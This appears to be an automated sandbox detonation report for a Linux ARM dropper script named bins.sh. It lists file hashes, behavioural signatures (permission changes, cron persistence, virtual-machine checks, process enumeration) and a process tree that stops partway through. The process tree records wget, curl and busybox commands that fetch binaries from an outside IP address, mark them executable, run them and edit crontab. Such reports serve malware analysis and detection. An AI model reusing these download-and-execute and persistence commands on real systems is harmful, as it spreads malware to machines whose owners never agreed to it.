SHA512 9f16256d17387296e8db97447dbad2bfb37bcba449646c8722c59d682520368dc72126154f4d03ba481ccfbab60a57f6364ef7cd841702ddaab499f139a8bc16

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

MD5 ce5a4484f1a3035c0ea26c7afdaca41a
SHA1 273817b918b6d340ea8e790e1bea66d42753bc88
SHA256 dcb9c7f0b11edbadfd48ebf73d5b547b4733248f926b312e0b3d1ad8dc9a005b
SHA512 b6392176876a7dd6c27dd3b9dc330aad7aa7f8db561e2d6f3e9ba4886282d93754dda5da437571829495126928059df33dd3cc90f4ee6196c61a65bfa35893c2

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

MD5 922fe012320c0e166262ea40f60bb607
SHA1 d6dfe219f1e3b9c6a5275adbf1bf676d152fc6cc
SHA256 4667698ab3d9a71a4ec803e745a0d99bd29bef427c645d7f9a1cd48c5bc90019
SHA512 2432c2158c56c5cf60fd5b1385a587c84e566540b61eed32c3edeadb65e1c1b5bd75fc889fbc34a46c08fc0fdf9cc42ca2d6a2eb203331a7be14b579a0554d8f

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

MD5 e6f998c484c65639a70fd231138de1c6
SHA1 21d14096c93f6fec22461b4c88b04d5982dce200
SHA256 8128bda5aa3eebdf285d771c676fd9fdf25bc2d4b222ce9ef63a8538207ed544
SHA512 1ff956462c3fcf8d09386bc7a96304d09b1e0116a6faf43538339032ec652f6668b939da677590dcd1e3a1e0771c97c4519d349dd9ab56bc6123cd69e27f248d

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

MD5 fa5fa357eba3c8bd22940c0aa48e2ff7
SHA1 dcf4e0b631809e4077ed277e6fceb359027ca80d
SHA256 b0338bf7da1a1a2ceb951c418b7a0af86745a8a3a94c0d3afd26a5e33826f60a
SHA512 e763e4761cf1833e5953353aad051c82e0263ce376b3fdb23282fe3385986b0d9a24d6ac9d7a8a23b3a66750d5c3688eb503f0e89f9e752aac2bf43c91648bff

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

MD5 176eac6dff4b7d5a554bee78f16fc1a9
SHA1 efdb5955b742769ae3932332177a54d3ecce8293
SHA256 97c28ebc6dd742525cc96914f7d6b7d3e2455a550b337a724c270e00a398c529
SHA512 85c3793e731a04c949e4d77537e48cc46b1c33969a5f8d7124e340522ddae4a4a2dd9968cb6f91b371a46d22fd0d8a2c75ee763b9293d739f6b9b49bbbbef3a4

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

MD5 42a4c23e813dd557099c72e9f9eb2ff2
SHA1 c7eb40e3c13d7bdbc9a4c9917b5005b8ce49c758
SHA256 109ac9d167a4f8b8caccf1175741ee59f6326a772c786c30405c6c2618c381fb
SHA512 107101c8f77b485cd5605e3e42204a723edd7abc1918f59e8e4840bd3f8fa928eb8edc3363cfb94ccdbc2b3b2f96e5d46f00300030d5d9c32380e396c5d8b418

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

MD5 4dcdc23ad9de8f8d88c6bc1e77574ced
SHA1 1bfdb0379dc2baa5fb1be48febc795c2c9a00fcf
SHA256 e95bfbb46c8519be56569724f69fc296771758f9e375cfc67b8b66cb8ca83c64
SHA512 f73da8ddfc41e98b8b06dc63d297c6feba73fda7f3cdc7bdc5382d31f9e6712ac6b2a899d9d4d9b18b5b02068c51781fc8704a9e740a8f73e22d469fc8a0e9b2

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

MD5 02c3ce8ed1974d0b279550a31f45722c
SHA1 ca93f5c6c8a5b2196131d7d6482fc7cd000c0e15
SHA256 e1f580ceaa877e3927e10bc18e2cb6cbf21bc09ecc80c6df488fbb7d2779d15e
SHA512 8d2b67b417e700826ca6dfcd7445df7811d7143497ed64aeab05c2fbb5dbe296d98817db46554f85d715a813d5496a6b51206d8bb647008a36f464234d2b5e59

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

MD5 698e625dc3b77f10d67e8cd006b01821
SHA1 b74e30da9b05ca115a8760f0b1c3d59cf8791fb0
SHA256 1101a9d0c94f62522d9b02fa1eefe29208b2ad3b1de5e8d9f127754f0ba40ae2
SHA512 bc5da5daca0de04974784e412c5a17d686b0a8277d332d56dcfa110549f8365524292e3f5c54e0c98c5a98843501e3bc493100d1ed2e0d8b0931357d02f5375d

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

MD5 27a1a1941f224eff6a4babf2495e3692
SHA1 86fae66a698f6280353e470ffadfb64441b03e83
SHA256 ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179
SHA512 cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

MD5 001419cb73f875a2a4ee44d0f0440fd0
SHA1 710c8d0897c7b9763f3ec3ee0c22065886cd447b
SHA256 57afc31ea4c686eee790c09be52c7f6a87514ab3646cd878d441ae3199b1f206
SHA512 aa0d1ec38944899bd8caaa7f7a8b787faa94ca79fbda170016c06aee2960912026cea15bfe28fc6e484b7abc8f327e10ed19f8f33c89cec6604cfb60a54dbec0

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

MD5 1f8fe56a53952c8c03ba1bd7b0e05ead
SHA1 5de1bd1037de1ff2b52fcfc375df519bc83c1c32
SHA256 7a910331948eb31c50858dc85c74d7f6875a6797104abbaef5a5ecbd0e08830e
SHA512 e2e1083a6ab4ff38a400bc988693f35ad7210180c044b078a77592488f208f2465d97ec53b40288561b0e3f1b1361365f6813845441694cd32031c51d33e2f2c

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

MD5 dedbb487201b1de127e9aa8496e922f0
SHA1 e673975a81d6150b36a03803ce9e41daceab8826
SHA256 6f532d437efafa18c87c7311d0367615678ee17a0b04dbb84e45e14a37bae3ed
SHA512 62c37ad31faf48f402a723689388211d0ee5aab1035fa6deea7476cc0b47f3b8f17c7cd4b40c12a66497e68a313b40c6fb7ff31687d3f34f73476ae09b739503

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

MD5 861f6204832e9cf32a51c84b79cb06ce
SHA1 8d34700b586544fa6df91dae4aab6838e355729e
SHA256 af981c79e1786cfa542ab36daf071a84b89820289f23d8cdd41fd6c32b97fb9c
SHA512 e7a1530ce7ad93e72b0b9571e2d5edd74d2b7dba93751e8094ce117ff56a8f618e65f51453d24b1feacb8126daa3ff9e24f614729ffe34d756e13c56bb9bd064

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

MD5 5955a838160c71fe77a2bf6b2d74c30c
SHA1 390275b42fb0743bbe64de03680de9689268b4cd
SHA256 81616aea0a67c71b1afb662535238e0b24d570992ab395126d9d0f834fd53e18
SHA512 46ddfe61797d7895c349f68b3cc57c7452e76d5365356eef1f61918a5377dc1df7c0531d80d5a14de4f6022cd33d6eed69b9d20866aae867458dc0795650f4b4

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

MD5 ea4d1a4f920004fee156960ef56c49da
SHA1 479fb5f909b4e0c7ec8e5c903c886d1f490305fc
SHA256 8fa96c19b11a5a01fc9f4c8df283fbed010ca359ba5e915dc1ab32acdbc00436
SHA512 5708f6400ed4b197c42e59a883b31c9c7fb6b002843affbe5a1513de9f3e0010c5be33a14189f7cabbb40d6cf62b607131fc41462319204b1d6a01387f3ad639

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

MD5 e00a37ab856a5bafcb04c7bbc8180198
SHA1 259b2acbdfb8962f58a6361d4a76cc03955904e3
SHA256 f5213f9f3aa8dea699c0060ca6ee8dfe81037890136d9a2aede870bff9283e7f
SHA512 86474d10f625afae79c1bdbcd46f52598f5f72e96b6bea394b5475bed15d14a60587c0430a89d19efd0a9ada58e403aaf8117dec4c68a75fded30255749077d6

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

MD5 a7e686eb3f74b104a5520f08cfd54eb5
SHA1 58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256 617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA512 2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

MD5 d4560d2f4e0dc406e2a16ca0e356d407
SHA1 56e060f4e2cdfd87d367a512ea7c89dd4b3601ac
SHA256 bfda82547d25a28bd911bd921db5e62e7d0b9e003fbf2b8e010debd22eadc01e
SHA512 c3c4e811af8ef517f7c23b845a6000cd5ee06f1b69e9bf5d444ee6d0e1308bcbf59c0f884a154fef47e00f1938c870e8d0a874ee12774f160700748c811c6824

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

MD5 dbf9b325abc5eacbc80261364e5359ca
SHA1 7daaf20dc520378084df02782e518b022b236e2f
SHA256 c3e911744eb84e746e6a32249a5371716113cdc3ac42445eb3b4b9ffd9c87dde
SHA512 a909b281f3079ae90597c47a8dbc5c0889507ac10c14537ec65aff0a698ab2e907673c6004aee130e5604d190bee1aaf72ffc832d09a301fba5ba7a7f779b86a

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

MD5 130e92e22ff4efae2c171e0e0ea741f5
SHA1 c4ee146b18953dbc69614b472a4f3658521912e4
SHA256 b1a7b4002082e6a8d6a07d96218f100cab0c136adb3d868e3d47671ee105e238
SHA512 f05dc9475cf2abef065346b953fdf4d51dacb6a45f1087f88404e3374667a8203ac8a2dfe7d12c074362f432ffb444f01b99edaa2f91d7bfd4bcdc96d14886fd

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 7bd55dcc60a07a5517fdcefcaa802fba
SHA1 f4f1b711109f67e9f18ab5454780dd2bf299b44e
SHA256 78faab9b7f22bdc4976322e8bb1b4d95191b830d1bb66a0c70dc9cf05a3cb7f4
SHA512 fc12fa9a459e92a139bd8267c63e50c8aa23d74fb4172ee6d84cb1de933a0ce04bafb2bcaa6a28fa53cde1498f4f4cd2b7d8ff42f00d71c81287e75e9ce8c76e

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

MD5 25bf88929b43318fa9ad5724906cafb9
SHA1 c4809bebba6b548efc5096d9b310c8b262b4e461
SHA256 f04a0a575b4cf75e9a09520b33b23cc8f12ac3f0b89fdbf24483a1224b77f692
SHA512 7fcd17012f4da19e8a75ca8991a280ff0997f471b7f4f0a9149133602242f25270f8e17623789f4a5302667a5b3caa896ab055522b19a39b8b9cb2ebbad92aa1

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

MD5 3b78bb645b81d600c30713d416f666be
SHA1 23796112f2cce2afb2217498b5ecf2801ab550f2
SHA256 d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA512 9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 01:53

Reported

2024-10-28 01:55

Platform

debian9-armhf-20240611-en

Max time kernel

150s

Max time network

137s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.5cFni0 /usr/bin/crontab N/A

Enumerates running processes

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/95/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/643/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/916/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/945/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/655/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/716/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/787/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/938/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/973/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/139/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/721/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/838/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/908/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/952/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/16/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/146/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/777/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/410/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/457/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/786/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/866/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/961/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/976/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/28/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/714/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/761/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/859/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/909/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/937/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/781/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/919/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/24/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/26/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/269/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/642/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/724/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/939/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/747/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/776/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/817/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/705/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/743/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/894/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/896/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/942/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/3/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/646/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/720/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/722/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/802/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/840/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/74/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/458/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/773/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/874/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/14/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/764/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/783/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/9/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
File opened for reading /proc/141/cmdline /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /bin/busybox N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /bin/busybox N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /bin/busybox N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /bin/busybox N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /bin/busybox N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /bin/busybox N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /bin/busybox N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /bin/busybox N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /bin/busybox N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /bin/busybox N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /bin/busybox N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /bin/busybox N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/wget N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /bin/busybox N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /bin/busybox N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /bin/busybox N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/wget N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /bin/busybox N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /bin/busybox N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /bin/busybox N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /bin/busybox N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /bin/busybox N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /bin/busybox N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/sh

[sh -c crontab -l]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c crontab -]

/usr/bin/crontab

[crontab -]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

